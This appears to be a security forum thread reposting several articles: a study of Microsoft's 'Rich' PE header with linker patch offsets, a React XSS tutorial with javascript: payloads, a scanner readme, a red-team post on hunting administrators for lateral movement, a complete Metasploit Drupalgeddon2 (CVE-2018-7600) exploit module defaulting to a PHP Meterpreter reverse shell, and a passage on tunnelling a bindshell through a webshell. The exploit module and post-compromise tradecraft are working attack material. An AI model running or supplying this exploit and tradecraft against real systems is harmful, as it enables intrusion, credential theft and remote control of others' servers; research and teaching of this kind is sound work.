builds its SDKs internally, but this happens to be a good thing for detection. This allows us to distinguish the SDK's compiler id/build pairs from those pairs that represent the compilers responsible for building the executable. In other words, if you know where the linker entry is and the entries that represent the SDK LIB files because they are not recognized public versions (see table below), the only thing left are the compiler entries we want to use for detection! You will then be able to determine the language used to build an executable, whether it be C, C++, MASM or all in combination in addition to the toolset version of each. All of this is assuming you want to use the build numbers alone for detection rather than hardcoding the differing tool ids per version of Visual Studio to combine with the build numbers. Going back to the KERNEL32.DLL example above, we can see the last entry's build number is 4035 which corresponds to one of the known public Microsoft 7.1 linkers. Using a lookup table, such as that shown below, applications can use this information to correlate [mostly] unique build numbers to known Microsoft Visual Studio toolsets. MASM 6.x BUILDS BUILD PRODUCT VERSION 7299 6.13.7299 8444 6.14.8444 8803 6.15.8803 Visual Basic 6.0 BUILDS BUILD PRODUCT VERSION 8169 6.0 (also reported with SP1 and SP2) 8495 6.0 SP3 8877 6.0 SP4 8964 6.0 SP5 9782 6.0 SP6 (same as reported by VC++ but different id) VISUAL STUDIO BUILDS BUILD PRODUCT VERSION CL VERSION LINK VERSION 8168 6.0 (RTM, SP1 or SP2) 12.00.8168 6.00.8168 8447 6.0 SP3 12.00.8168 6.00.8447 8799 6.0 SP4 12.00.8804 6.00.8447 8966 6.0 SP5 12.00.8804 6.00.8447 9044 6.0 SP5 Processor Pack 12.00.8804 6.00.8447 9782 6.0 SP6 12.00.8804 6.00.8447 9466 7.0 2002 13.00.9466 7.00.9466 9955 7.0 2002 SP1 13.00.9466 7.00.9955 3077 7.1 2003 13.10.3077 7.10.3077 3052 7.1 2003 Free Toolkit 13.10.3052 7.10.3052 4035 7.1 2003 13.10.4035 (SDK/DDK?) 6030 7.1 2003 SP1 13.10.6030 7.10.6030 50327 8.0 2005 (Beta) ? ? 50727 (linkver 8.x) 8.0 2005 14.00.50727.42 14.00.50727.762 SP1? 21022 9.0 2008 15.00.21022 30729 9.0 2008 SP1 15.00.30729.01 30319 10.0 2010 16.00.30319 40219 10.0 2010 SP1 16.00.40219 50727 (linkver 11.x) 11.0 2012 17.00.50727 51025 11.0 2012 17.00.51025 51106 11.0 2012 update 1 17.00.51106 60315 11.0 2012 update 2 17.00.60315 60610 11.0 2012 update 3 17.00.60610 61030 11.0 2012 update 4 17.00.61030 21005 12.0 2013 18.00.21005 30501 12.0 2013 update 2 18.00.30501 40629 12.0 2013 SP5 18.00.40629 SP5 22215 14.0 2015 19.00.22215 Preview 23506 14.0 2015 SP1 19.00.23506 SP1 23824 14.0 2015 update 2 (unverified) 24215 14.0 2015 19.00.24215.1 (unverified) NOTE: The table above was compiled from various sources; it is not an exhaustive list. BUILD NUMBERS DON'T ALWAYS MATCH REPORTED COMMAND LINE/ VERSION RESOURCE VALUES! As you can see, the build numbers don't always correspond to what is reported from the command line. For example cl.exe for Visual C++ 6.0 reports version 12.00.8804 for Service Packs 4 thru 6, however the "@comp.id" value written to OBJ files is different for each service pack, such as 8799,8966,9044, and 9782 for SP4, SP5, SP5 (Processor Pack) and SP6 respectively. You can see the same pattern in Visual C++ 7.x. This allows for unique detection for each Service Pack. PATCHING THE MICROSOFT LINKER: Rather than using a tool (such as peupdate) to remove the "Rich" header on a per-executable basis, it is possible to "fix" the linker so that the "Rich" header is never written in the first place. It wasn't long between the "Rich" header's discovery gone public and the appearance of a linker patch to prevent the structure from being written to the executable. This is a cleaner solution than manually zeroing-out each executable produced, however a new patch is needed for each version of the linker. As an added bonus, patching reclaims the area originally occupied by the "Rich" header (usually offset 0x80) as the spot where the PE header will instead be placed. This can reduce the size of the executable depending on the file alignment value passed to the linker. In August of 2005, there was a PE tutorial written by Goppit that briefly describes using a tool called Signature Finder to patch the Linker. This is a simple GUI tool that when supplied the path to LINK.EXE, locates the RVA address of the CALL instruction for the routine which generates the "Rich" Header. Knowing where the "Rich" routine is invoked by the linker is the first step; how to patch is up to you. However the traditional patch method is to NOP-out the ADD instruction following the CALL. To do this, load LINK.EXE in a disassembler or debugger and navigate to the location reported by the tool (adding a 0x400000 base address to the reported RVA). If you have symbols loaded, you'll see disassembly similar to the following within the IMAGE::BuildImage() function: 0045F0A5 E8 56 45 FC FF call ?UpdateCORPcons@@YGXXZ ; UpdateCORPcons(void) 0045F0AA 55 push ebp ; struct IMAGE * 0045F0AB E8 30 D2 01 00 call ?UpdateSXdata@@YGXPAVIMAGE@@@Z ; UpdateSXdata(IMAGE *) 0045F0B0 8D 54 24 14 lea edx, [esp+448h+lpMem] 0045F0B4 52 push edx 0045F0B5 55 push ebp 0045F0B6 E8 45 A6 FF FF call ?CbBuildProdidBlock@IMAGE@@AAEKPAPAX@Z ; IMAGE::CbBuildProdidBlock(void**) <--- BUILDS the "Rich" Header 0045F0BB 8B 8D 3C 02 00 00 mov ecx, [ebp+23Ch] 0045F0C1 03 C8 add ecx, eax ; <--- NOP this out! 0045F0C3 89 44 24 2C mov [esp+448h+var_41C], eax 0045F0C7 89 8D 40 02 00 00 mov [ebp+240h], ecx 0045F0CD FF 15 BC 12 40 00 call ds:__imp___tzset The "Rich" Header routine identified by the tool is named CbBuildProdidBlock(); we can now assume Microsoft internally refers to the "Rich" structure as the "Product ID Block". If the ADD instruction below it (address 0x45F0C1) is changed from bytes "03 C8" to "90 90" (NOPs), the linker still internally generates the structure, but because we've removed the instruction that advances the current file position, the PE header (which comes next in the image) overwrites the "Rich" structure. Problem solved, no information leak. If you don't want to run the Signature Finder tool, below is a table with patch address information for all of the publicly-released 6.xx and 7.xx Microsoft linkers. The location is for the "ADD ECX,EAX" instruction (bytes "03 C8"). To perform the patch, replace the ADD instruction with two NOP bytes ("90 90"). This can be done with the bytepatch tool using the following command line: bytepatch -pa <address> link.exe 90 90 Replace <address> above with the value in the ADDRESS column below on whatever linker you are using. VERSION SHIPPED WITH MD5 SIZE ADDRESS FILE OFFSET LINK.EXE 6.00.8168 MSVC 6.0 RTM,SP1,SP2 7b3d59dc25226ad2183b5fb3a0249540 462901 0x44551A 0x4551A LINK.EXE 6.00.8447 MSVC 6.0 SP3,SP4,SP5,SP6 24323f3eb0d1afa112ee63b100288547 462901 0x445826 0x45826 LINK.EXE 7.00.9466 MSVC .NET 7.0 (2002) RTM dbb5bf0ce85516c96a5cbdcc3d42a97e 643072 0x45CD82 0x5CD82 LINK.EXE 7.00.9955 MSVC .NET 7.0 (2002) SP1 2042a0f45768bc359a5c912d67ad0031 643072 0x45CD32 0x5CD32 LINK.EXE 7.10.3052 MSVC .NET Free Toolkit 8d7a69e96e4cc9c67a4a3bca1b678385 647168 0x45EA0F 0x5EA0F LINK.EXE 7.10.3077 MSVC .NET 7.1 (2003) 4677d4806cd3566c24615dd4334a2d4e 647168 0x45EA0F 0x5EA0F LINK.EXE 7.10.6030 MSVC .NET 7.1 (2003) SP1 59572e90b9fe958e51ed59a589f1e275 647168 0x45F0C1 0x5F0C1 Unfortunately, the Signature Finder tool only works with Microsoft linkers prior to and including Visual Studio .NET 7.1 (2003). RE Analysis of the tool indicates that it searches up to 4 possible linker signatures (all known linkers available at the time of the tool's release in 2004), so trying to patch a newer linker such as the one that shipped with MSVC .NET 8.0 (2005), results in an error. However, manually finding the location using a disassembler is not difficult. I received an e-mail from icestudent with a method he uses to manually patch each Microsoft linker release from 8.0 and up. Here is a break-down of this method: Ensure your symbol path is set correctly; then download symbols for the linker you want to patch; e.g.: symchk /v LINK.EXE open LINK.EXE with IDA Pro Open the imports window, locate "_tzset", and go to it Open the references for "_tzset" (CTRL-X) and go to the "IMAGE::BuildImage" reference (or the "IMAGE::GenerateWinMDFile" for CLR executables). Around the "CALL _tzset" instruction, locate the "CALL IMAGE::CbBuildProdidBlock" instruction. In older versions of the linker it was closer and above "_tzset", in modern versions it is below and quite far. If you don't have symbols, check for all CALL instructions around "_tzset" and find the one where the referenced function begins with a call to "HeapAlloc"; this will be the "IMAGE::CbBuildProdidBlock()" function. After the "CALL IMAGE::CbBuildProdidBlock", you will see some code like "MOV reg, ...", "ADD reg, reg2", "MOV [mem], reg". NOP-out the second ADD instruction (or sometimes LEA) which is responsible for adjusting the PE offset in memory past the Rich signature. If you don't use the method above, the table below contains the patch offsets for some post MSVC 7.x linkers. Thanks goes to icestudent for this information! 32-BIT LINK.EXE x86 VERSION OFFSET ORIGINAL BYTES PATCH BYTES 8 SP1 0x6A382 03 D0 90 90 9 RTM 0x6A20F 03 C8 90 90 9 SP1 0x6BE7F 03 C8 90 90 10 B1 0x6CF50 03 C8 90 90 10 B2 0x75EED 03 D0 90 90 10 CTP 0x6C26D 03 C8 90 90 10 SP1 0x760AD 03 D0 90 90 11 RTM U1 0x235BF 03 CE 90 90 11 RTM 0x17AEF 03 CE 90 90 vc18 CTP2 0x31920 03 CB 90 90 vc18 PREVIEW 0x1B3D8 03 CF 90 90 vc18 RC1 0x27B43 03 CF 90 90 vc18 RTM 0x31168 03 CB 90 90 64-BIT LINK.EXE x64 VERSION OFFSET ORIGINAL BYTES PATCH BYTES 8 RTM 0x8157A 93 8B 8 SP1 0x80DAC 93 8B 9 RTM 0x78205 93 8B 9 SP1 KB 0x78CE1 8D 14 0E 90 90 90 9 SP1 0x78CE5 93 8B 10 B1 0x7A01F 93 8B 10 B2 0x7A09D 93 8B 10 SP1 0x7A06D 93 8B 11 RTM U1 0x136B5 03 D0 90 90 11 RTM 0x136B5 03 D0 90 90 vc18 CTP2 0xE22A 03 D0 90 90 vc18 PREVIEW 0x853D 03 D0 90 90 vc18 RC1 0xE684 03 D0 90 90 vc18 RTM 0xEF3A 03 D0 90 90 To patch using the offsets in the table above, use the following bytepatch command line, replacing <file-offset> and <patch-bytes> with the appropriate entry: bytepatch -a <file-offset> link.exe <patch-bytes> CONSPIRACY THEORIES: When the public first became aware of the "Rich" header, the obvious encryption of this structure of unknown information made a lot of people nervous and suspicious. Because Microsoft never officially confirmed the existence of this structure, their lack of transparency made a lot of developers assume the worst. Here you can have an identical-source program built on two different machines and end up with a slightly different executable because the information contained within the "Rich" header was different. It is not surprising that people assumed Microsoft was embedding machine or otherwise personally identifiable information within the structure. These might include a NIC/MAC address, a CPU identifier, Windows registration information or even a unique GUID representing a particular installed instance of a Microsoft product or operating system. In reality, the only thing stored here are the build numbers for the Microsoft-specific tools responsible for a specific component in an executable module. The slightest difference in Visual Studio version, SDK version or 3rd party libraries used will cause an alteration of the "Rich" header. The PE/COFF specification defines a minimum file alignment of 512 bytes. Since this value leaves more than enough room for an executable's header section to fully contain the DOS and PE headers, there will always be leftover wasted space between the headers section and the subsequent section. Microsoft capitalized on this fact by inserting the "Rich" header in the padding space, since it wouldn't generally affect the final executable size one way or the other. To Microsoft's credit, the "Rich" header offers invaluable debugging statistics about how a given executable was built. Because the Visual C/C++ compiler and linker command lines are probably among the most complex command lines of any of Microsoft products to date, not to mention the different versions of those tools available and combinations of SDKs that can be used, a structure such as the "Rich" header being embedded within every executable could certainly save countless man hours in debugging complex build environment problems. Did I mention Microsoft's internal build environment is among the most complex in the world? If Microsoft's case against the author of a virus hinged on the virus being created by a particular version of Visual Studio that matched the version on a confiscated machine, I guess the "Rich" header could be used as evidence to prove this fact but probably not much more. There are other useful reasons Microsoft might want to bury such a secret "fingerprint" within executables. If Microsoft could prove which versions of certain libraries were employed, this would help them to assert intellectual property rights or even a redistribution license violation as they could distinguish between public, beta and pre-release versions. If companies used beta versions of Microsoft tools or libraries to release executables to the public outside of a specific time period, Microsoft would now have a way to find out. The "Rich" header could also help ensure publicly released benchmark tests were done fairly on properly built, Microsoft-sanctioned executables. These reasons could have been a bigger deal at the time the "Rich" header was invented than they are today. The problem was that Microsoft intentionally hid and encrypted this information. Since the structure doesn't officially exist, there isn't going to be an official way to disable it. Anyone who develops with Microsoft tools gets this structure crammed in their executable whether or they like it or not. Failing to document this fact can be considered a questionable practice. However, once people realized Microsoft wasn't embedding personally identifiable information in their executables, the "Rich" header was no longer the hot topic it once was. ORIGINS OF "RICH" AND "DANS" SEQUENCES: According to a 2012 post on Daniel Pistelli's RCE Cafe blog, information from two people who claimed to have worked on the Microsoft Visual C++ team said the word "Rich" likely originated from "Richard Shupak", a Microsoft employee who worked in the research department and had a hand in the Visual C++ linker/library code base. NOTE: Richard Shupak is listed as the author at the top of the file PSAPI.H in the Platform SDK. The PSAPI library (The NT "Process Status Helper" APIs) retrieves information about processes, modules and drivers. "DanS" was likely attributed to employee "Dan Spalding" who presumably ran the linker team. I can vouch for the fact that there was a "Dan Spalding" employee working on the Visual C++ team around the turn of the century. Apparently their initials also show up in the MSF/PDB format! CONCLUSION AND REFERENCES: The first known public information about this structure goes back to at least July 7th, 2004 from the article, Things They Didn't Tell You About MS LINK and the PE Header, a loose specification authored by "lifewire". I've archived the article here, because it is no longer available at one of the original links. While the article was brief, it was densely packed with useful details, such as the layout of the "Rich" structure and how the checksum key is calculated. It is not mentioned how the author came to know such information, but information like this is usually leaked or derived from reverse engineering. At the end of the article, he attributes the "Dan^" sequence as being a reference to Microsoft employee "Dan Ruder", but the sequence was actually and has always been "DanS", so I think this conclusion is incorrect. When I was writing the pelook tool and was looking to add minimal compiler signature detection, I initially stumbled upon Daniel Pistelli's excellent 2008 article, titled Microsoft's Rich Signature (undocumented). This article describes what he discovered while reverse engineering Microsoft's linker. Pistelli's research was independent of lifewire's 2004 article which was unknown to him at the time. Despite this, he arrived at the same conclusion. Pistelli's article was the first I'd heard of such a structure. I was surprised to learn of its existence and that it had been right under my nose all of those years. I was even more surprised that further information (official or unofficial) was not available. My goal in writing this article was to fill in some of the gaps of information not previously available, such as how far back Microsoft's linker had support for the "Rich" structure and how it changed between different versions of Visual Studio. Other links I found useful: A tutorial from 2010 that was based off of the original "lifewire" article. A posting on asmcommunity A posting on trendystephen <END OF ARTICLE> Sursa: http://bytepointer.com/articles/the_microsoft_rich_header.htm
      • 1
      • Thanks
  4. Ron Perris Apr 15 Avoiding XSS in React is Still Hard Introduction I’ve spent the last few weeks thinking about React from a secure coding perspective. Since React is a library for creating component based user interfaces, most of the attack surface is related to issues with rendering elements in the DOM. The smart folks over at Facebook have handled this by building automatic escaping into the React DOM library code. Built-in Escaping is Limited The escaping code in React DOM works great when you are passing a string value into [...children] . Notice the other two arguments to React.createElement type and [props], values passed into them are unescaped. // From https://reactjs.org/docs/react-api.html#createelement React.createElement( type, [props], [...children] ) Data Passed as Props is Unescaped When you pass data into a React element via props, the data is not escaped before being rendered into the DOM. This means that an attacker can control the raw values inside of HTML attributes. A classic XSS attack is to put a URL with a javascript: protocol into the href value of an anchor tag. When a user clicks on the anchor tag the browser will execute the JavaScript found in the href attribute value. // Classic XSS via anchor tag href attribute. <a href="javascript: alert(1)">Click me!</a> This classic XSS attack still works in React when rendering a component with React DOM. // Classic XSS via anchor tag href attribute in a React component. ReactDOM.render( <a href="javascript: alert(1)">Click me!</a>, document.getElementById('root') ) Mitigating XSS Attacks on React Props There are a few options for mitigating attacks on React components. You could do contextual escaping for the prop value. You would need a list of known bad values for each attribute and you would need to know which characters to escape to make the value benign. Historically this hasn’t gone very well. You could also try filtering, which also hasn’t gone very well in the past. For prop values you probably want to use validation. Here is a common attempt at avoiding XSS with blacklist style validation. const URL = require('url-parse') const url = new URL(attackerControlled) function isSafe(url) { if (url.protocol === 'javascript:') return false return true } isSafe(URL('javascript: alert(1)')) // Returns false isSafe(URL('http://www.reactjs.org')) // Returns true This approach seems to be working, but as we will see shortly it will only prevent simple attacks that don’t attempt to evade the blacklist. Validating Against a Blacklist is Hard In the example above we are doing a lot of things right. We are using the npm module called url-parse to parse the URL instead of hand-rolling a solution. We are attempting to validate the url with an isolated reusable function, so that our security audits and remediation tasks will be easier. We are handling the failure case first in the function and using an early return strategy to handle a failure. It is usually a bad idea to use blacklists to enforce validation. Here we can defeat the isSafe function using our spacebar. const URL = require('url-parse') function isSafe(url) { if (url.protocol === 'javascript:') return false return true } isSafe(URL(' javascript: alert(1)')) // Returns true isSafe(URL('http://www.reactjs.org')) // Returns true Reading npm Module Documentation is Hard (Not Joking) The reason that isSafe(URL(' javascript: alert(1)')) doesn’t work as intended in our isSafe function is described in the documentation page for url-parse over on npm. baseURL (Object | String): An object or string representing the base URL to use in case urlis a relative URL. This argument is optional and defaults to location in the browser. So when we pass the string javascript: alert(1) with a leading space I think url-parse assumes we are providing a relative URL and it is happy to assume the protocol from the browser’s location. In this case it believes the protocol for javascript: alert(1) is http:. const URL = require('url-parse') URL(' javascript: alert(1)').protocol // Returns http: If we look further down in the documentation for url-parse on npm we will find this part. Note that when url-parse is used in a browser environment, it will default to using the browser's current window location as the base URL when parsing all inputs. To parse an input independently of the browser's current URL (e.g. for functionality parity with the library in a Node environment), pass an empty location object as the second parameter: It tells us that if we pass an empty location object as the second parameter to instances of url-parse we can disable the behavior that is causing all strings to be treated as having the browser’s location protocol as their protocol. const URL = require('url-parse') URL(' javascript: alert(1)', {}).protocol // Returns "" With an empty object as the second argument we can see that we get an empty string back as the protocol for javascript: alert(1) . Fixing that Blacklist Function Looking back at the isSafe(url) blacklist function we can improve it by looking for empty strings in addition to the javascript: protocol. const URL = require('url-parse') const url = new URL(attackerControlled) function isSafe(url) { if (url.protocol === 'javascript:') return false if (url.protocol === '') return false return true } isSafe(URL('javascript: alert(1)', {})) // Returns false isSafe(URL('http://www.reactjs.org')) // Returns true Oh yeah, this is a post about React XSS security. Let’s get back to that now. We can try to use our improved isSafe function to do some validation in a React component. import React, { Component } from 'react' import ReactDOM from 'react-dom' import URL from 'url-parse' class SafeURL extends Component { isSafe(dangerousURL, text) { const url = URL(dangerousURL, {}) if (url.protocol === 'javascript:') return false if (url.protocol === '') return false return true } render() { const dangerousURL = this.props.dangerousURL const safeURL = this.isSafe(dangerousURL) ? dangerousURL : null return <a href={safeURL}>{this.props.text}</a> } } ReactDOM.render( <SafeURL dangerousURL=" javascript: alert(1)" text="Click me!" />, document.getElementById('root') ) This example above is not injectable, maybe. Whitelist Validation I’ve never feel very comfortable with blacklist based solutions for security. It would be like if you heard a noise in your house at night and went downstairs to find an unfamiliar person standing in your living room and in order to figure out if they belonged in your house you looked them up in a criminal offenders database. I prefer whitelist based solutions. I know who is supposed to be in my house. import React, { Component } from 'react' import ReactDOM from 'react-dom' const URL = require('url-parse') class SafeURL extends Component { isSafe(dangerousURL, text) { const url = URL(dangerousURL, {}) if (url.protocol === 'http:') return true if (url.protocol === 'https:') return true return false } render() { const dangerousURL = this.props.dangerousURL const safeURL = this.isSafe(dangerousURL) ? dangerousURL : null return <a href={safeURL}>{this.props.text}</a> } } ReactDOM.render( <SafeURL dangerousURL=" javascript: alert(1)" text="Click me!" />, document.getElementById('root') ) Sursa: https://medium.com/javascript-security/avoiding-xss-in-react-is-still-hard-d2b5c7ad9412
  5. Red Team Arsenal Red Team Arsenal is a web/network security scanner which has the capability to scan all company's online facing assets and provide an holistic security view of any security anomalies. It's a closely linked collections of security engines to conduct/simulate attacks and monitor public facing assets for anomalies and leaks. It's an intelligent scanner detecting security anomalies in all layer 7 assets and gives a detailed report with integration support with nessus. As companies continue to expand their footprint on INTERNET via various acquisitions and geographical expansions, human driven security engineering is not scalable, hence, companies need feedback driven automated systems to stay put. Installation Supported Platforms RTA has been tested both on Ubuntu/Debian (apt-get based distros) and as well as Mac OS. It should ideally work with any linux based distributions with mongo and python installed (install required python libraries from install/py_dependencies manually). Prerequisites: There are a few packages which are necessary before proceeding with the installation: Git client: sudo apt-get install git Python 2.7, which is installed by default in most systems Python pip: sudo apt-get install python-pip MongoDB: Read the official installation guide to install it on your machine. Finally run python install/install.py There are also optional packages/tools you can install (highly recommended): Sursa: https://github.com/flipkart-incubator/RTA
  6. “I Hunt Sys Admins” Published January 19, 2015 by harmj0y [Edit 8/13/15] – Here is how the old version 1.9 cmdlets in this post translate to PowerView 2.0: Get-NetGroups -> Get-NetGroup Get-UserProperties -> Get-UserProperty Invoke-UserFieldSearch -> Find-UserField Get-NetSessions -> Get-NetSession Invoke-StealthUserHunter -> Invoke-UserHunter -Stealth Invoke-UserProcessHunter -> Invoke-ProcessHunter -Username X Get-NetProcesses -> Get-NetProcess Get-UserLogonEvents -> Get-UserEvent Invoke-UserEventHunter -> Invoke-EventHunter [Note] This post is a companion to the Shmoocon ’15 Firetalks presentation I gave, also appropriately titled “I Hunt Sys Admins”. The slides are here and the video is up on Irongeek. Big thanks to Adrian, @grecs and all the other organizers, volunteers, and sponsors for putting on a cool event! [Edit] I gave an expanded version of my Shmoocon talk at BSides Austin 2015, the slides are up here. One of the most common problems we encounter on engagements is tracking down where specific users have logged in on a network. If you’re in the lateral spread phase of your assessment, this often means gaining some kind of desktop/local admin access and performing the Hunt -> pop box -> Mimikatz -> profit pattern. Other times you may have domain admin access, and want to demonstrate impact by doing something like owning the CEO’s desktop or email. Knowing what users log in to what boxes from where can also give you a better understanding of a network layout and implicit trust relationships. This post will cover various ways to hunt for target users on a Windows network. I’m taking the “assume compromise” perspective, meaning that I’m assuming you already have a foothold on a Windows domain machine. I’ll cover the existing prior art and tradecraft (that I know of) and then will show some of the efforts I’ve implemented with PowerView. I really like the concept of “Offense in Depth“- in short, it’s always good to have multiple options in case you hit a snag at some step in your attack chain. PowerShell is great, but you always need to have backups in case something goes wrong. Existing Tools and Tradecraft The Sysinternals tool psloggedon.exe has been around for several years. It “…determines who is logged on by scanning the keys under the HKEY_USERS key” as well as using the NetSessionEnum API call. Admins (and hackers) have used this official Microsoft tool for years. One note: some of its functionality requires admin privileges on the remote machine you’re enumerating. Another “old school” tool we’ve used in the past is netsess.exe, a part of the joeware utilities. It also takes advantage of the NetSessionEnum call, and doesn’t need administrative privileges on a remote host. Think of a “net session” that works on remote machines. PVEFindADUser.exe is a tool released by the awesome @corelanc0d3r in 2009. Corelanc0d3r talks about the project here. It can help you find AD users, including enumerating the last logged in user for a particular system. However, you do need to have admin access on machines you’re running it against. Rob Fuller (@mubix’s) netview.exe project is a tool we’ve used heavily since it’s release at Derbycon 2012. It’s a tool to “enumerate systems using WinAPI calls”. It utilizes NetSessionEnum to find sessions, NetShareEnum to find shares, and NetWkstaUserEnum to find logged on users. It can now also check share access, highlight high value users, and use a delay/jitter. You don’t need administrative privileges to get most of this information from a remote machine. Nmap‘s flexible scripting engine also gives us some options. If you have a valid domain account, or local account valid for several machines, you can use smb-enum-sessions.nse to get remote session information from a remote box. And you don’t need admin privileges! If you have access to a user’s internal email, you can also glean some interesting information from internal email headers. Search for any chains to/from target users, and check any headers for given email chains. The “X-Originating-IP” header is often present, and can let you trace where a user sent a given email from. Scott Sutherland (@_nullbind) wrote a post in 2012 highlighting a few other ways to hunt for domain admin processes. Check out techniques 3 and 4, where he details other ways to scan remote machines for specific process owners, as well as how to scan for NetBIOS information of interest using nbtscan. For remote tasklistings, you’ll need local administrator permissions on the targets you’re going after. We’ll return to this in the PowerShell section. And finally, Smbexec has a checkda module which will check systems for domain admin processes and/or logins. Veil-Pillage takes this a step further with its user_hunter and group_hunter modules, which can give you flexibility beyond just domain admins. For both Smbexec and Veil-Pillage, you will need admin rights on the remote hosts. Active Directory: It’s a Feature! Active Directory is an awesome source of information from both offensive and defensive perspectives. One of the biggest turning points in the evolution of my tradecraft was when I began to learn just how much information AD can give up. Various user fields in Active Directory can give you some great starting points to track down users. The homeDirectory property, which contains the path to a user’s auto-mounted home drive, can give you a good number of file servers. The profilePath property, which contains a user’s roaming profile, can also sometimes give you a few servers to check out as well. Try running something like netsess.exe or netview.exe against these remote servers. They key here is that you’re using AD information to identify servers that several users are likely connected to. And the best part is, you don’t need any elevated privileges to query this type of user information! Also, Scott wrote another cool post early in 2014 on using service principal names to find locations where domain admin accounts might be. In short, you can use Scott’s Get-SPN PowerShell script to enumerate all servers where domain admins are registered to run services. I highly recommend checking it out for some more information. This is also something that the prolific Carlos Perez talked about at at Derbycon 2014. Once you get domain admin, but still want to track down particular users, Windows event logs can be a great place to check as well. One of my colleagues (@sixdub) write a great post on offensive event parsing for the purposes of user hunting. We’ll return to this as well shortly. PowerShell PowerShell PowerShell Anyone who’s read this blog or seen me speak knows that I won’t shut up about PowerShell, Microsoft’s handy post-exploitation language. PowerShell has some awesome AD hooks and various ways to access the lower-level Windows API. @mattifestation has written about several ways to interact with the Windows API through PowerShell here, here, and here. His most recent release with PSReflect makes it super easy to play with this lower-level access. This is something I’ve written about before. PowerView is a PowerShell situational-awareness tool I’ve been working on for a while that includes a few functions that help you hunt for users. To find users to target, Get-NetGroups *wildcard* will return groups containing specific wildcard terms. Also, Get-UserProperties will extract all user property fields, and Invoke-UserFieldSearch will search particular user fields for wildcard terms. This can sometimes help you narrow down users to hunt for. For example, we’ve used these functions to find the Linux administrators group and its associated members, so we could then hunt them down and keylog their PuTTY/SSH sessions The Invoke-UserHunter function can help you hunt for specific users on the domain. It accepts a username, userlist, or domain group, and accepts a host list or queries the domain for available hosts. It then runs Get-NetSessions and Get-NetLoggedon against every server (using those NetSessionEnum and NetWkstaUserEnum API functions) and compares the results against the resulting target user set. Everything is flexible, letting you define who to hunt for where. Again, admin privileges are not needed. Invoke-StealthUserHunter can get you good coverage with less traffic. It issues one query to get all users in the domain, extracts all servers from user.HomeDirectories, and runs a Get-NetSessions against each resulting server. As you aren’t touching every single machine like with Invoke-UserHunter, this traffic will be more “stealthy”, but your machine coverage won’t be as complete. We like to use Invoke-StealthUserHunter as a default, falling back to its more noisy brother if we can’t find what we need. A recently added PowerView function is Invoke-UserProcessHunter. It utilizes the newly christened Get-NetProcesses cmdlet to enumerate the process/tasklists of remote machines, searching for target users. You will need admin access to the machines you’re enumerating. The last user hunting function in PowerView is the weaponized version of @sixdub‘s post described above. The Get-UserLogonEvents cmdlet will query a remote host for logon events (ID 4624). Invoke-UserEventHunter wraps this up into a method that queries all available domain controllers for logon events linked to a particular user. You will need domain admin access in order to query these events from a DC. If I missed any tools or approaches, please let me know! Sursa: http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
  7. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Drupalgeddon2', 'Description' => %q{ CVE-2018-7600 / SA-CORE-2018-002 Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. The module can load msf PHP arch payloads, using the php/base64 encoder. The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' }, 'License' => MSF_LICENSE, 'Author' => [ 'Vitalii Rudnykh', # initial PoC 'Hans Topo', # further research and ruby port 'José Ignacio Rojo' # further research and msf module ], 'References' => [ ['SA-CORE', '2018-002'], ['CVE', '2018-7600'], ], 'DefaultOptions' => { 'encoder' => 'php/base64', 'payload' => 'php/meterpreter/reverse_tcp', }, 'Privileged' => false, 'Platform' => ['php'], 'Arch' => [ARCH_PHP], 'Targets' => [ ['User register form with exec', {}], ], 'DisclosureDate' => 'Apr 15 2018', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']), ]) register_advanced_options( [ ]) end def uri_path normalize_uri(target_uri.path) end def exploit_user_register data = Rex::MIME::Message.new data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"') data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"') data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"') data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"') data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"') post_data = data.to_s # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri_path}user/register", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'vars_get' => { 'element_parents' => 'account/mail/#value', 'ajax_form' => '1', '_wrapper_format' => 'drupal_ajax', } }) end ## # Main ## def exploit case datastore['TARGET'] when 0 exploit_user_register else fail_with(Failure::BadConfig, "Invalid target selected.") end end end Sursa: https://www.exploit-db.com/exploits/44482/
  8. Interactive bindshell over HTTP By Kevin April 18, 2018 Primitives needed Webshell on a webserver Intro What do you do when you have exploited this webserver and really want an interactive shell, but the network has zero open ports and the only way in is through http port 80 on the webserver you’ve exploited? The answer is simple. Tunnel your traffic inside HTTP using the existing webserver. We previously have had this issue and had some messy solutions and sometimes just an open port by luck. Therefore we wanted a more generic approach that could be reused everytime we have a webshell. We started writing our tool called webtunfwd which did what we wanted. It listened on a local port on our attacking machine and then when we connected to the local port, it would then post whatever was inside socket.recv to a webserver with a POST request. The webserver would then take whatever was sent inside this POST request and feed it into the socket connection on the victim. Note: The diagram below is taken from the Tunna project’s github So this is a little walkthrough on what happens: Attacker uploads webtunfwd.php to victim which is now placed on victim:80/webtunfwd.php Attacker uploads his malware and/or a meterpreter bindshell which listens on localhost:20000 Victim is now listening on localhost:20000 Attacker calls webtunfwd.php?broker which connects to localhost:20000 and keeps the connection open. webtunfwd.php?broker reads from socket and writes it to a tempfile we’ll call out.tmp webtunfwd.php?broker reads from a tempfile we’ll call in.tmp and writes it to the socket Great. Now we have webtunfwd.php?broker which handles the socket connection on the victim side and keeps it open forever. We now need to write and read from the two files in.tmp and out.tmp respectively, down to our attacking machine. This is handeled by our python script local.py Attacker runs local.py on his machine which listens on the port localhost:11337 Attacker now connects with the meterpreter client to localhost:11337 When local.py recieves the connection it creates 2 threads. One for read and one for write The read thread reads from socket and writes to in.tmp by creating a POST request with the data to webtunfwd.php?write The write thread reads from out.tmp by creating a GET request to webtunfwd.php?read and writes to the socket So with this code we now have a dynamic port forwarding through HTTP and we can run whatever 